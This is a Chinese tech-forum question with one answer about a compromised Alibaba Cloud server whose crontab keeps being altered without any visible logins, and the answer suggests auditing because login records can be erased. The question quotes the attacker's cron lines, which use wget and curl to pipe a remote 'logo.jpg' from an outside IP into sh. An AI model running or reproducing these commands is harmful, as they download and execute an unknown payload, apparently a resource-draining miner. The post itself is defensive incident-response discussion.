注册登录
提 问
English中文版
IT其它crontab

被人修改了某个用户的crontab,没有看到该用户在该时间前后登录过系统?

一台阿里云机器,被人修改了某个用户的crontab/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh/10 * curl http://91.230.47.40/common/logo.jpg|sh导致这台CPU100%等问题。查看/var/log/cron发现是该用户修改了cron,记录下修改时间但是用last|more查看用...显示全部

一台阿里云机器,被人修改了某个用户的crontab

/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh

/10 * curl http://91.230.47.40/common/logo.jpg|sh

导致这台CPU100%等问题。
查看/var/log/cron发现是该用户修改了cron,记录下修改时间
但是用last|more查看用户登录情况没有看到该用户在该时间前后登录过系统。
后来修改了用户的密码,去除了crontab中的内容,但是过几天发现crontab又被修改了。同时也没有该用户在期间有登录的信息。请问如何做到了,如何避免这种情况再次发生。团队中没有人去修改,有点像病毒一样或者被人攻击了。

收起
关注4
评论
参与8

查看其它 2 个回答y18511664518的回答

y18511664518y18511664518技术总监长城超云

登陆记录都是可以删除的,最好能有审计方式做一下审计,或者把日志监控起来,抓取相关方面的。

金融其它 · 2017-09-04
浏览1915
评论

回答者

y18511664518
y18511664518028
技术总监长城超云
擅长领域: 数据库存储关系型数据库
关注601
回答412
评论483

y18511664518 最近回答过的问题

  • 将业务逻辑实现方从Oracle数据库上移至应用,那么如何评估改造量和改造难度?兼容性如何保障?
  • PostgreSQL数据库相比主流开源如MYSQL有哪些优势,相比主流闭源如ORACLE有哪些优势,能否进行下对比?
  • 市面上做PostgreSQL维保的集成商多么?
  • 好想知道现在oracle在中国还能用多久,国产数据库看好哪个呢,方向趋势可以讨论下子嘛,好迷茫啊~~~?
  • ORACLE 11GR2 重新配置数据库选件的问题?

    • 回答状态

  • 发布时间:2017-09-04
  • 关注会员:4 人
  • 回答浏览:1915

    • 关于TWT使用指南社区专家合作厂商入驻社区企业招聘投诉建议版权与免责声明联系我们
    © 2024talkwithtrend — talk with trend,talk with technologist京ICP备09031017号-30

    X社区推广